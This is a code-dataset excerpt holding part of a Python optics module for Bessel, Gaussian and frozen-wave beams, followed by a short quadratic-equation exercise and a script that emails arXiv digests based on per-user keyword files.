krho/ma.sin(theta)\n\n        if self.wavenumber is not None:\n            self.wavenumber = self.wavenumber\n\n    @property\n    def bessel_spot(self):\n        return self._bessel_spot\n\n    @bessel_spot.setter\n    def bessel_spot(self, value):\n        print('bessel_spot cannot be set directly; it is derived from the transversal wavenumber')\n\n    @property\n    def axicon_angle(self):\n        return self._axicon_angle\n\n    @axicon_angle.setter\n    def axicon_angle(self, theta):\n        if theta < 0:\n            raise ValueError('theta value error: it is negative')\n        if theta > pi/2:\n            raise ValueError('theta value error: it is greater than pi/2')\n\n        self._axicon_angle = theta\n        self._axicon_angle_degree = 180*theta/pi\n\n        if self.longitudinal_wavenumber is not None:\n            kz = self.longitudinal_wavenumber\n            if theta != pi/2:\n                self.wavenumber = kz/ma.cos(theta)\n\n        if self.transversal_wavenumber is not None:\n            krho = self.transversal_wavenumber\n            if theta != 0:\n                self.wavenumber = krho/ma.sin(theta)\n\n        if self.wavenumber is not None:\n            self.wavenumber = self.wavenumber\n\n    @property\n    def axicon_angle_degree(self):\n        return self._axicon_angle_degree\n\n    @axicon_angle_degree.setter\n    def axicon_angle_degree(self, value):\n        self._axicon_angle_degree = value\n        self.axicon_angle = value*pi/180\n\n    @property\n    def bessel_order(self):\n        return self._bessel_order\n\n    @bessel_order.setter\n    def bessel_order(self, value):\n        self._bessel_order = value\n        krho = self.transversal_wavenumber\n        if krho:  # guard against an unset (None) or zero transversal wavenumber\n            self._bessel_spot = ss.jn_zeros(value, 1)[0]/krho\n        else:\n            self._bessel_spot = ma.inf\n\n    def psi(self, x1, x2, x3, system='cartesian'):\n        if system == 'cylindrical':\n            rho, phi, z = x1, x2, x3\n        else:\n            rho, phi, z = Point(x1, x2, x3, system).cylindrical()\n\n        return (self._amplitude*cm.exp(1j*self._phase)\n                *ss.jv(self._bessel_order, self._transversal_wavenumber*rho)\n                *cm.exp(-1j*self._longitudinal_wavenumber*z)\n                *cm.exp(1j*self._bessel_order*phi))\n\n\n
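# Added for clarity (not in the original module): the setters above keep the
# wavenumbers and the axicon angle mutually consistent via
# k**2 == kz**2 + krho**2, with kz == k*cos(theta) and krho == k*sin(theta).
# A small, illustrative consistency check:
def _bessel_wavenumbers_consistent(beam, rel_tol=1e-9):
    """Return True if a Bessel beam's k, kz and krho satisfy k**2 = kz**2 + krho**2."""
    k = beam.wavenumber
    kz = beam.longitudinal_wavenumber
    krho = beam.transversal_wavenumber
    return abs(k**2 - (kz**2 + krho**2)) <= rel_tol*k**2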
class ScalarGaussianBeam(Beam):\n    intrinsic_params = ('_q',\n                        '_gaussian_spot',\n                        '_rayleigh_range',)\n\n    params = Beam.params + intrinsic_params\n\n    def __init__(self, **kwargs):\n        Beam.__init__(self, self)\n\n        self.beams = [self]\n        self.name = 'scalar-gaussian-beam'\n\n        self._q = None\n        self._gaussian_spot = None\n        self._rayleigh_range = None\n\n        for key, value in kwargs.items():\n            if hasattr(self, '_' + key):\n                setattr(self, key, value)\n\n    @property\n    def q(self):\n        return self._q\n\n    @q.setter\n    def q(self, value):\n        self._q = value\n        if value == 0:\n            self.gaussian_spot = ma.inf\n        elif cm.isinf(value):\n            self.gaussian_spot = 0\n        else:\n            self.gaussian_spot = ma.sqrt(1/value.real)\n\n    @property\n    def gaussian_spot(self):\n        return self._gaussian_spot\n\n    @gaussian_spot.setter\n    def gaussian_spot(self, value):\n        self._gaussian_spot = value\n        self._rayleigh_range = pi*value**2/self._wavelength\n\n        if self._q is not None:\n            return\n\n        if value == 0:\n            self._q = ma.inf\n        elif ma.isinf(value):\n            self._q = 0\n        else:\n            self._q = 1/value**2\n\n    @property\n    def rayleigh_range(self):\n        return self._rayleigh_range\n\n    @rayleigh_range.setter\n    def rayleigh_range(self, value):\n        self._rayleigh_range = value\n        self.gaussian_spot = ma.sqrt(value*self._wavelength/pi)\n\n    def waist_radius(self, x1, x2, x3, system='cartesian'):\n        point = Point(x1, x2, x3, system)\n        if self.rayleigh_range == 0:\n            return ma.inf\n        return self._gaussian_spot*ma.sqrt(1+(point.z/self.rayleigh_range)**2)\n\n    def fwhm(self, x1, x2, x3, system='cartesian'):\n        # fixed: waist_radius takes coordinates, not a Point instance\n        return self.waist_radius(x1, x2, x3, system)*ma.sqrt(2*ma.log(2))\n\n    def curvature_radius(self, x1, x2, x3, system='cartesian'):\n        point = Point(x1, x2, x3, system)\n        if point.z == 0:\n            return ma.inf\n        return point.z*(1+(self.rayleigh_range/point.z)**2)\n\n    def gouy_phase(self, x1, x2, x3, system='cartesian'):\n        point = Point(x1, x2, x3, system)\n        if self.rayleigh_range == 0:\n            return pi\n        return ma.atan(point.z/self.rayleigh_range)\n\n    def psi(self, x1, x2, x3, system='cartesian'):\n        if system == 'cylindrical':\n            rho, phi, z = x1, x2, x3\n        else:\n            rho, phi, z = Point(x1, x2, x3, system).cylindrical()\n        k = self._wavenumber\n        q = self._q\n        return (self._amplitude*cm.exp(1j*self._phase)\n                *(1/(1+1j*z*2*q/k))*cm.exp(+1j*z*k)\n                *cm.exp((-q*rho**2)/(1+1j*z*2*q/k)))\n\n\nclass ScalarBesselGaussBeam(ScalarBesselBeam, ScalarGaussianBeam):\n    intrinsic_params = ScalarBesselBeam.intrinsic_params\n    intrinsic_params += ScalarGaussianBeam.intrinsic_params\n    params = Beam.params + intrinsic_params\n\n    def __init__(self, **kwargs):\n        ScalarBesselBeam.__init__(self)\n        ScalarGaussianBeam.__init__(self)\n\n        self.beams = [self]\n        self.name = 'scalar-bessel-gauss-beam'\n\n        for key, value in kwargs.items():\n            if hasattr(self, '_' + key):\n                setattr(self, key, value)\n\n    def psi(self, x1, x2, x3, system='cartesian'):\n        if system == 'cylindrical':\n            rho, phi, z = x1, x2, x3\n        else:\n            rho, phi, z = Point(x1, x2, x3, system).cylindrical()\n\n        q = self._q\n        k = self._wavenumber\n        krho = self._transversal_wavenumber\n\n        if z != 0:\n            Q = q + 1j*k/(2*z)\n            num = 1j*k/(2*z*Q)\n            exp1 = cm.exp(-1j*k*(z+rho**2/(2*z)))\n            bessel = ss.jv(0, num*krho*rho)\n            exp2 = cm.exp(-(krho**2 + k**2*rho**2/z**2)/(4*Q))\n            if ma.isinf(bessel.real):\n                # fall back to the z = 0 form when the Bessel factor overflows;\n                # the original branches assigned 'value' twice and left the z = 0 case undefined\n                value = ss.jv(0, krho*rho)*cm.exp(-q*rho**2)\n            else:\n                value = num*exp1*bessel*exp2\n        else:\n            value = ss.jv(0, krho*rho)*cm.exp(-q*rho**2)\n\n        return self._amplitude*cm.exp(1j*self._phase)*value\n\n\nclass ScalarBesselGaussBeamSuperposition(ScalarBesselGaussBeam):\n    intrinsic_params = ScalarBesselGaussBeam.intrinsic_params\n\n    intrinsic_params += ('_N',\n                         '_zmax',\n                         '_R',\n                         '_L',\n                         '_qr')\n\n    params = Beam.params + intrinsic_params\n\n    def __init__(self, **kwargs):\n        
ScalarBesselGaussBeam.__init__(self)\n\n self.beams = [self]\n self.name = 'scalar-bessel-gauss-beam-superposition'\n\n self._N = None\n self._zmax = None\n self._R = None\n self._L = None\n self._qr = None\n\n for key, value in kwargs.items():\n if hasattr(self, '_' + key):\n setattr(self, key, value)\n\n self.__create_superposition()\n\n @property\n def q(self):\n return self._q\n\n @q.setter\n def q(self, value):\n self._q = value\n\n if value == 0:\n self.gaussian_spot = ma.inf\n elif cm.isinf(value):\n self.gaussian_spot = 0\n else:\n self.gaussian_spot = ma.sqrt(1/value.real)\n\n self.__create_superposition()\n\n @property\n def N(self):\n return self._N\n\n @N.setter\n def N(self, N):\n self._N = N\n self.__create_superposition()\n\n @property\n def zmax(self):\n return self._zmax\n\n @zmax.setter\n def zmax(self, value):\n self._zmax = value\n\n if (self.axicon_angle is None and self.R is not None):\n self.axicon_angle = ma.atan(self.R/self.zmax)\n\n if (self.axicon_angle is not None and self.R is None):\n self.R = (self.zmax*ma.tan(self.axicon_angle))\n\n self.__create_superposition()\n\n @property\n def R(self):\n return self._R\n\n @R.setter\n def R(self, value):\n self._R = value\n\n if self.L is None:\n self.L = 3*value**2\n\n if self.axicon_angle is None and self.zmax is not None:\n self.axicon_angle = ma.atan(value/self.zmax)\n\n if self.axicon_angle is not None and self.zmax is None:\n if self.axicon_angle == 0:\n self.zmax = ma.inf\n else:\n self.zmax = value/ma.tan(self.axicon_angle)\n\n self.__create_superposition()\n\n @property\n def axicon_angle(self):\n return self._axicon_angle\n\n @axicon_angle.setter\n def axicon_angle(self, theta):\n self._axicon_angle = theta\n self._axicon_angle_degree = 180*theta/pi\n\n if self.longitudinal_wavenumber is not None:\n kz = self.longitudinal_wavenumber\n if theta != pi/2:\n self.wavenumber = kz/ma.cos(theta)\n\n if self.transversal_wavenumber is not None:\n krho = self.transversal_wavenumber\n if theta != 0:\n self.wavenumber = krho/ma.sin(theta)\n\n if self.zmax is None and self.R is not None:\n self.zmax = self.R/ma.tan(theta)\n\n if self.zmax is not None and self.R is None:\n self.R = self.zmax*ma.tan(theta)\n\n if self.wavenumber is not None:\n self.wavenumber = self.wavenumber\n\n self.__create_superposition()\n\n @property\n def L(self):\n return self._L\n\n @L.setter\n def L(self, L):\n self._L = L\n if self.qr is None:\n self.qr = 6/L\n self.__create_superposition()\n\n @property\n def qr(self):\n return self._qr\n\n @qr.setter\n def qr(self, qr):\n self._qr = qr\n self.__create_superposition()\n\n def __create_superposition(self):\n if Beam.is_all_params_defined(self) is False:\n return\n\n def amplitude_n(n):\n arg = (self.qr - self.q - 2j*pi*n/self.L)*self.R**2\n den = self.L*(self.qr-self.q)/2 - 1j*pi*n\n if den != 0:\n return cm.sinh(arg)/den\n elif den == 0 and arg == 0:\n return 2*self.R**2/self.L\n else:\n return 0\n\n self.beams = []\n\n for i in range(2*self.N + 1):\n n_index = i - self.N\n beam = ScalarBesselGaussBeam()\n beam.amplitude = amplitude_n(n_index)\n beam.wavelength = self.wavelength\n beam.medium_refractive_index = self.medium_refractive_index\n beam.transversal_wavenumber = self.transversal_wavenumber\n beam.q = (self.qr - 1j*2*pi*n_index/self.L)\n self.beams.append(beam)\n\n def psi(self, x1, x2, x3, system='cartesian'):\n return (self._amplitude*cm.exp(1j*self._phase)\n *sum([beam.psi(x1, x2, x3, system) for beam in self.beams]))\n\n\nclass ScalarFrozenWave(Beam):\n intrinsic_params = ('_Q',\n 
'_N',\n '_L',\n '_bessel_order',\n '_reference_function',)\n\n params = Beam.params + intrinsic_params\n\n def __init__(self, centered=True, **kwargs):\n Beam.__init__(self, self)\n self.name = 'scalar-frozen-wave'\n self.beams = [self]\n self.centered = centered\n\n self._Q = None\n self._N = None\n self._L = None\n self._bessel_order = 0\n self._reference_function = None # string\n self.func = None # function\n #self.amplitudes = []\n\n for key, value in kwargs.items():\n if hasattr(self, '_' + key):\n setattr(self, key, value)\n\n self.__create_superposition()\n\n @property\n def Q(self):\n return self._Q\n\n @Q.setter\n def Q(self, value):\n self._Q = value\n self.__create_superposition()\n\n @property\n def N(self):\n return self._N\n\n @N.setter\n def N(self, value):\n self._N = value\n self.__create_superposition()\n\n @property\n def L(self):\n return self._L\n\n @L.setter\n def L(self, value):\n self._L = value\n self.__create_superposition()\n\n @property\n def bessel_order(self):\n return self._bessel_order\n\n @bessel_order.setter\n def bessel_order(self, value):\n self._bessel_order = value\n\n @property\n def reference_function(self):\n return self.func\n\n @reference_function.setter\n def reference_function(self, func):\n self.func = func\n self._reference_function = '%s' % func.__name__\n self.__create_superposition()\n\n def __create_superposition(self):\n if (Beam.is_all_params_defined(self) is False or self.func is None):\n return\n\n def amplitude_n(n):\n func_real = lambda z: (self.func(z)*cm.exp(+2j*pi*z*n/self.L)).real\n func_imag = lambda z: (self.func(z)*cm.exp(+2j*pi*z*n/self.L)).imag\n if self.centered:\n an_real, err = quad(func_real, -self.L/2, self.L/2)\n an_imag, err = quad(func_imag, -self.L/2, self.L/2)\n else:\n an_real, err = quad(func_real, 0, self.L)\n an_imag, err = quad(func_imag, 0, self.L)\n return (an_real + 1j*an_imag)/self.L\n\n if 2*pi*self.N/self.L > self.wavenumber/2:\n error_msg = 'Combination of N, L and k does not '\n error_msg += 'satisfy Q range condition.'\n raise NameError(error_msg)\n\n if self.Q + 2*pi*self.N/self.L > self.wavenumber:\n msg = 'Q is too large. '\n msg += 'It was changed from %fk '%(self.Q/self.wavenumber)\n self.Q = self.wavenumber - 2*pi*self.N/self.L\n msg += 'to %fk.' % (self.Q/self.wavenumber)\n print(msg)\n\n if self.Q - 2*pi*self.N/self.L < 0:\n msg = 'Q is too low. '\n msg += 'It was changed from %fk '%(self.Q/self.wavenumber)\n self.Q = 2*pi*self.N/self.L\n msg += 'to %fk.' 
% (self.Q/self.wavenumber)\n print(msg)\n\n self.beams = []\n for i in range(2*self.N + 1):\n n_index = i - self.N\n beam = ScalarBesselBeam()\n beam.amplitude = amplitude_n(n_index)\n beam.wavelength = self.wavelength\n beam.medium_refractive_index = self.medium_refractive_index\n beam.longitudinal_wavenumber = self.Q + 2*pi*n_index/self.L\n beam.bessel_order = self.bessel_order\n self.beams.append(beam)\n\n def psi(self, x1, x2, x3, system='cartesian'):\n return (self._amplitude*cm.exp(1j*self._phase)\n *sum([beam.psi(x1, x2, x3, system) for beam in self.beams]))\n\n\nclass VectorialBeam(Beam):\n intrinsic_params = ()\n\n params = Beam.params + intrinsic_params\n\n def __init__(self, beams, name='generic-vectorial-beam'):\n Beam.__init__(self, beams, name)\n\n def __add__(self, other):\n # raise error if one generic params if different from another.\n if self.wavelength != other.wavelength:\n raise NameError('Beams with differents wavelength')\n if self.vacuum_wavelength != other.vacuum_wavelength:\n raise NameError('Beams with differents vacuum_wavelength')\n\n # effetuate the sum because all generic params are equal.\n beams = []\n for beam in self.beams:\n if len(self.beams) > 1:\n beam._amplitude *= self._amplitude\n beam._phase += self._phase\n beams.append(copy.copy(beam))\n\n for beam in other.beams:\n if len(other.beams) > 1:\n beam._amplitude *= other._amplitude\n beam._phase += other._phase\n beams.append(copy.copy(beam))\n\n return VectorialBeam(beams)\n\n def Ex(self, x1, x2, x3, system='cartesian'):\n return (self._amplitude*cm.exp(1j*self._phase)\n *sum([beam.Ex(x1, x2, x3, system)\n for beam in self.beams]))\n\n def Ey(self, x1, x2, x3, system='cartesian'):\n return (self._amplitude*cm.exp(1j*self._phase)\n *sum([beam.Ey(x1, x2, x3, system)\n for beam in self.beams]))\n\n def Ez(self, x1, x2, x3, system='cartesian'):\n return (self._amplitude*cm.exp(1j*self._phase)\n *sum([beam.Ez(x1, x2, x3, system)\n for beam in self.beams]))\n\n def E(self, x1, x2, x3, system='cartesian'):\n return (self.Ex(x1, x2, x3, system),\n self.Ey(x1, x2, x3, system),\n self.Ez(x1, x2, x3, system),)\n\n def electric_field(self, x1, x2, x3, system='cartesian'):\n return self.E(x1, x2, x3, system)\n\n def Hx(self, x1, x2, x3, system='cartesian'):\n return (self._amplitude*cm.exp(1j*self._phase)\n *sum([beam.Hx(x1, x2, x3, system)\n for beam in self.beams]))\n\n def Hy(self, x1, x2, x3, system='cartesian'):\n return (self._amplitude*cm.exp(1j*self._phase)\n *sum([beam.Hy(x1, x2, x3, system)\n for beam in self.beams]))\n\n def Hz(self, x1, x2, x3, system='cartesian'):\n return (self._amplitude*cm.exp(1j*self._phase)\n *sum([beam.Hz(x1, x2, x3, system)\n for beam in self.beams]))\n\n def H(self, x1, x2, x3, system='cartesian'):\n return (self.Hx(x1, x2, x3, system),\n self.Hy(x1, x2, x3, system),\n self.Hz(x1, x2, x3, system),)\n\n def magnetic_field(self, x1, x2, x3, system='cartesian'):\n return self.H(x1, x2, x3, system)\n\n def intensity(self, x1, x2, x3, system='cartesian'):\n Ex, Ey, Ez = self.E(x1, x2, x3, system)\n return abs(Ex)**2 + abs(Ey)**2 + abs(Ez)**2\n\n def electric_field_direction(self, x1, x2, x3, system='cartesian'):\n E0 = [E.real for E in self.E(x1, x2, x3, system)]\n E0_abs = np.linalg.norm(E0)\n return [E/E0_abs for E in E0]\n\n def wavenumber_direction(self, x1, x2, x3, system='cartesian'):\n wdir = np.cross(self.E(x1, x2, x3, system),\n np.conjugate(self.H(x1, x2, x3, system)))\n wdir = [wd.real for wd in wdir]\n wdir_abs = np.linalg.norm(wdir)\n return [wd/wdir_abs for wd in 
wdir]\n\n\nclass VectorialBesselBeam(ScalarBesselBeam, VectorialBeam):\n intrinsic_params = ScalarBesselBeam.intrinsic_params\n intrinsic_params += VectorialBeam.intrinsic_params\n params = VectorialBeam.params + intrinsic_params\n\n def __init__(self, **kwargs):\n ScalarBesselBeam.__init__(self)\n VectorialBeam.__init__(self, self)\n\n self.beams = [self]\n self.name = 'vectorial-bessel-beam'\n\n for key, value in kwargs.items():\n if hasattr(self, '_' + key):\n setattr(self, key, value)\n\n #def wavenumber_direction(self, x1, x2, x3, system='cartesian'):\n # return super(ScalarBesselBeam, self).wavenumber_direction(x1, x2, x3, system)\n\n def __some_params(self):\n return (self._longitudinal_wavenumber,\n self._transversal_wavenumber,\n self._bessel_order,\n self._axicon_angle,)\n\n def Ex(self, x1, x2, x3, system='cartesian'):\n if system == 'cylindrical':\n rho, phi, z = x1, x2, x3\n else:\n rho, phi, z = Point(x1, x2, x3, system).cylindrical()\n\n kz, krho, ni, alpha = self.__some_params()\n\n return (self._amplitude*cm.exp(1j*self._phase)\n *0.25*(1+ma.cos(alpha))*(-1j)**ni*cm.exp(-1j*kz*z)\n *(+(1+ma.cos(alpha))*ss.jv(ni, krho*rho\n )\n +0.5*(1-ma.cos(alpha))*(+cm.exp(+2j*phi)\n *ss.jv(ni+2, krho*rho)\n +cm.exp(-2j*phi)\n *ss.jv(ni-2, krho*rho))))\n\n def Ey(self, x1, x2, x3, system='cartesian'):\n if system == 'cylindrical':\n rho, phi, z = x1, x2, x3\n else:\n rho, phi, z = Point(x1, x2, x3, system).cylindrical()\n\n kz, krho, ni, alpha = self.__some_params()\n\n return (self._amplitude*cm.exp(1j*self._phase)\n *0.25*(1+ma.cos(alpha))*(-1j)**ni*cm.exp(-1j*kz*z)\n *(-0.5j*(1-ma.cos(alpha))*(+cm.exp(+2j*phi)\n *ss.jv(ni+2, krho*rho)\n -cm.exp(-2j*phi)\n *ss.jv(ni-2, krho*rho))))\n\n def Ez(self, x1, x2, x3, system='cartesian'):\n if system == 'cylindrical':\n rho, phi, z = x1, x2, x3\n else:\n rho, phi, z = Point(x1, x2, x3, system).cylindrical()\n\n kz, krho, ni, alpha = self.__some_params()\n\n return (self._amplitude*cm.exp(1j*self._phase)\n *0.25*(1+ma.cos(alpha))*(-1j)**ni*cm.exp(-1j*kz*z)\n *(+1j*ma.sin(alpha)*(+cm.exp(+1j*phi)\n *ss.jv(ni+1, krho*rho)\n -cm.exp(-1j*phi)\n *ss.jv(ni-1, krho*rho))))\n\n def Hx(self, x1, x2, x3, system='cartesian'):\n if system == 'cylindrical':\n rho, phi, z = x1, x2, x3\n else:\n rho, phi, z = Point(x1, x2, x3, system).cylindrical()\n\n kz, krho, ni, alpha = self.__some_params()\n\n const = SPEED_OF_LIGHT*VACUUM_PERMEABILITY\n\n return (self._amplitude*cm.exp(1j*self._phase)/const\n *0.25*(1+ma.cos(alpha))*(-1j)**ni*cm.exp(-1j*kz*z)\n *(-0.5j*(1-ma.cos(alpha))*(+cm.exp(+2j*phi)\n *ss.jv(ni+2, krho*rho)\n -cm.exp(-2j*phi)\n *ss.jv(ni-2, krho*rho))))\n\n def Hy(self, x1, x2, x3, system='cartesian'):\n if system == 'cylindrical':\n rho, phi, z = x1, x2, x3\n else:\n rho, phi, z = Point(x1, x2, x3, system).cylindrical()\n\n kz, krho, ni, alpha = self.__some_params()\n\n const = SPEED_OF_LIGHT*VACUUM_PERMEABILITY\n\n return (self._amplitude*cm.exp(1j*self._phase)/const\n *0.25*(1+ma.cos(alpha))*(-1j)**ni*cm.exp(-1j*kz*z)\n *(+(1+ma.cos(alpha))*ss.jv(ni, krho*rho)\n -0.5*(1-ma.cos(alpha))*(+cm.exp(+2j*phi)\n *ss.jv(ni+2, krho*rho)\n +cm.exp(-2j*phi)\n *ss.jv(ni-2, krho*rho))))\n\n def Hz(self, x1, x2, x3, system='cartesian'):\n if system == 'cylindrical':\n rho, phi, z = x1, x2, x3\n else:\n rho, phi, z = Point(x1, x2, x3, system).cylindrical()\n\n kz, krho, ni, alpha = self.__some_params()\n\n const = SPEED_OF_LIGHT*VACUUM_PERMEABILITY\n\n return (self._amplitude*cm.exp(1j*self._phase)/const\n *0.25*(1+ma.cos(alpha))*(-1j)**ni*cm.exp(-1j*kz*z)\n 
*(ma.sin(alpha)*(+cm.exp(+1j*phi)\n *ss.jv(ni+1, krho*rho)\n +cm.exp(-1j*phi)\n *ss.jv(ni-1, krho*rho))))\n\n def intensity(self, x1, x2, x3, system='cartesian'):\n return super(VectorialBeam, self).intensity(x1, x2, x3, system)\n\n\nclass VectorialFrozenWave(VectorialBeam):\n intrinsic_params = ('_Q',\n '_N',\n '_L',\n '_bessel_order',\n '_reference_function',)\n\n params = VectorialBeam.params + intrinsic_params\n\n def __init__(self, centered=True, **kwargs):\n VectorialBeam.__init__(self, self)\n\n self.name = 'vectorial-frozen-wave'\n self.beams = [self]\n self.centered = centered\n\n self._Q = None\n self._N = None\n self._L = None\n self._bessel_order = 0\n self._reference_function = None # string\n self.func = None # function\n #self.amplitudes = []\n\n for key, value in kwargs.items():\n if hasattr(self, '_' + key):\n setattr(self, key, value)\n\n self.__create_superposition()\n\n @property\n def Q(self):\n return self._Q\n\n @Q.setter\n def Q(self, value):\n self._Q = value\n self.__create_superposition()\n\n @property\n def N(self):\n return self._N\n\n @N.setter\n def N(self, value):\n self._N = value\n self.__create_superposition()\n\n @property\n def L(self):\n return self._L\n\n @L.setter\n def L(self, value):\n self._L = value\n self.__create_superposition()\n\n @property\n def bessel_order(self):\n return self._bessel_order\n\n @bessel_order.setter\n def bessel_order(self, value):\n self._bessel_order = value\n\n @property\n def reference_function(self):\n return self.func\n\n @reference_function.setter\n def reference_function(self, func):\n self.func = func\n self._reference_function = '%s' % func.__name__\n self.__create_superposition()\n\n def __create_superposition(self):\n if (Beam.is_all_params_defined(self) is False or self.func is None):\n return\n\n def amplitude_n(n):\n func_real = lambda z: (self.func(z)*cm.exp(+2j*pi*z*n/self.L)).real\n func_imag = lambda z: (self.func(z)*cm.exp(+2j*pi*z*n/self.L)).imag\n\n if self.centered:\n an_real, err = quad(func_real, -self.L/2, self.L/2)\n an_imag, err = quad(func_imag, -self.L/2, self.L/2)\n else:\n an_real, err = quad(func_real, 0, self.L)\n an_imag, err = quad(func_imag, 0, self.L)\n\n return (an_real + 1j*an_imag)/self.L\n\n if 2*pi*self.N/self.L > self.wavenumber/2:\n error_msg = 'Combination of N, L and k does not '\n error_msg += 'satisfy Q range condition.'\n raise NameError(error_msg)\n\n if self.Q + 2*pi*self.N/self.L > self.wavenumber:\n msg = 'Q is too large. '\n msg += 'It was changed from %fk '%(self.Q/self.wavenumber)\n self.Q = self.wavenumber - 2*pi*self.N/self.L\n msg += 'to %fk.' % (self.Q/self.wavenumber)\n print(msg)\n\n if self.Q - 2*pi*self.N/self.L < 0:\n msg = 'Q is too low. '\n msg += 'It was changed from %fk '%(self.Q/self.wavenumber)\n self.Q = 2*pi*self.N/self.L\n msg += 'to %fk.' 
% (self.Q/self.wavenumber)\n            print(msg)\n\n        self.beams = []\n        for i in range(2*self.N + 1):\n            n_index = i - self.N\n            beam = VectorialBesselBeam()\n            beam.wavelength = self.wavelength\n            beam.medium_refractive_index = self.medium_refractive_index\n            beam.longitudinal_wavenumber = self.Q + 2*pi*n_index/self.L\n            beam.amplitude = (amplitude_n(n_index)*4\n                              /(1+ma.cos(beam._axicon_angle))**2)\n            beam.bessel_order = self.bessel_order\n            self.beams.append(beam)\n\n\nclass Point(object):\n    def __init__(self, x1, x2, x3, system='cartesian'):\n        if system == 'cartesian':\n            self.__init(x1, x2, x3)\n        elif system == 'cylindrical':\n            self.__init(x1*ma.cos(x2), x1*ma.sin(x2), x3)\n        elif system == 'spherical':\n            self.__init(x1*ma.sin(x2)*ma.cos(x3),\n                        x1*ma.sin(x2)*ma.sin(x3),\n                        x1*ma.cos(x2))\n        else:\n            raise NameError('System not defined. Choose among '\n                            + '\"cartesian\", \"cylindrical\" or \"spherical\".')\n\n    def __add__(self, other):\n        x = self.x + other.x\n        y = self.y + other.y\n        z = self.z + other.z\n        return Point(x, y, z)\n\n    def __radd__(self, other):\n        if other == 0:\n            return self\n        else:\n            return self.__add__(other)\n\n    def __sub__(self, other):\n        x = self.x - other.x\n        y = self.y - other.y\n        z = self.z - other.z\n        return Point(x, y, z)\n\n    def __str__(self):\n        return (\"cartesian = (%s, %s, %s).\"\n                % (str(self.x), str(self.y), str(self.z)) + '\\n'\n                + \"cylindrical = (%s, %s, %s).\"\n                % (str(self.rho), str(self.phi), str(self.z)) + '\\n'\n                + \"spherical = (%s, %s, %s).\"\n                % (str(self.r), str(self.theta), str(self.phi)))\n\n    def __init(self, x, y, z):\n        # cartesian\n        self.x = x\n        self.y = y\n        self.z = z\n\n        # cylindrical\n        self.rho = ma.sqrt(x**2 + y**2)\n        if x != 0:\n            self.phi = ma.atan(y/x)\n            self.phi += pi if x <= 0 and y >= 0 else 0\n            self.phi -= pi if x <= 0 and y < 0 else 0\n        else:\n            if self.y < 0:\n                self.phi = -pi/2\n            elif self.y == 0:\n                self.phi = 0.0\n            else:\n                self.phi = pi/2\n\n        # spherical\n        self.r = ma.sqrt(x**2 + y**2 + z**2)\n        if self.r != 0:\n            self.theta = ma.acos(z/self.r)\n        else:\n            self.theta = 0.0\n\n    def abs(self):\n        return self.r\n\n    def normalize(self):\n        return [self.x/self.r, self.y/self.r, self.z/self.r]\n\n    def cartesian(self):\n        return [self.x, self.y, self.z]\n\n    def cylindrical(self):\n        return [self.rho, self.phi, self.z]\n\n    def spherical(self):\n        return [self.r, self.theta, self.phi]\n\n\nif __name__ == \"__main__\":\n    print(\"Please visit: https://github.com/arantespp/opticalforces\")\n","repo_name":"arantespp/opticalforces","sub_path":"opticalforces/beam.py","file_name":"beam.py","file_ext":"py","file_size_in_byte":44647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"}
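A small standalone check of the Point class's azimuth bookkeeping above: its piecewise atan logic appears to reproduce math.atan2, which handles all quadrants directly. This is an illustrative sketch, not part of either repository.

import math

def azimuth(x, y):
    # math.atan2 covers the same quadrant corrections the Point class applies by hand
    return math.atan2(y, x)

for x, y in [(1.0, 1.0), (-1.0, 1.0), (-1.0, -1.0), (0.0, 2.0), (0.0, -2.0)]:
    rho = math.hypot(x, y)
    phi = azimuth(x, y)
    # round-trip back to cartesian coordinates
    assert abs(rho*math.cos(phi) - x) < 1e-12
    assert abs(rho*math.sin(phi) - y) < 1e-12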
+{"seq_id":"72927560486","text":"# LESSON 5 EXERCISES\n# Eduardo Maciel Sanchez\n\n# 20. Solves quadratic equations\n\nimport math\n\ndef Ex19():\n\n    def calcEqua():\n        delta = (b**2) - (4*a*c)\n        if delta < 0:\n            print('There are no real roots.')\n        elif delta == 0:\n            x1 = -b/(2*a)\n            print('The only root is ', x1)\n        else:\n            x1 = (-b + math.sqrt(delta))/(2*a)\n            x2 = (-b - math.sqrt(delta))/(2*a)\n            print('The roots are x1=', x1, ' and x2= ', x2)\n\n    a = float(input(\"Enter coefficient a: \"))\n    b = float(input(\"Enter coefficient b: \"))\n    c = float(input(\"Enter coefficient c: \"))\n    calcEqua()","repo_name":"DesolateElf-dev/Algoritmos","sub_path":"Algoritmos/modulo_01/Ex20.py","file_name":"Ex20.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"18732031489","text":"import datetime\nimport sys\nimport os\nimport csv\nimport pandas as pd\nimport time\n\nsys.path.insert(0, os.path.join(os.path.split(os.getcwd())[0],'src/'))\nfrom arxivbulletin import arxivbulletin\n\ndef openfile(fn):\n    # open and read from user provided files\n    try:\n        results = []\n        with open(os.path.join(os.path.split(os.getcwd())[0], fn)) as f:\n            for line in f:\n                results.append(line.strip())\n        return results\n    # if the file does not exist, return an empty list\n    except IOError:\n        results = []\n        return results\n\npath = '/home/bart/Documents/arXiv/cmtucla_arXiv'\n# Go through folders with users\nuser_list = []\nfor subdir, dirs, files in os.walk(os.path.join(path, 'users')):\n    for folders in dirs:\n        user_list.append(folders)\n\n\nfor user in user_list:\n    keywords = openfile(os.path.join(path, 'users/', user, 'keywords.txt'))\n    keyauthors = openfile(os.path.join(path, 'users/', user, 'keyauthors.txt'))\n    myconfig = pd.read_csv(os.path.join(path, 'users/', user, 'config.csv'), header=None, index_col=0, squeeze=True).to_dict()\n    myconfig['categories'] = openfile(os.path.join(path, 'users/', user, 'categories.txt'))\n\n    arxivsummary = arxivbulletin(myconfig, keywords, keyauthors)\n    arxivsummary.send_report()\n    time.sleep(4)\n","repo_name":"bartandrews/cmtucla_arXiv","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"}
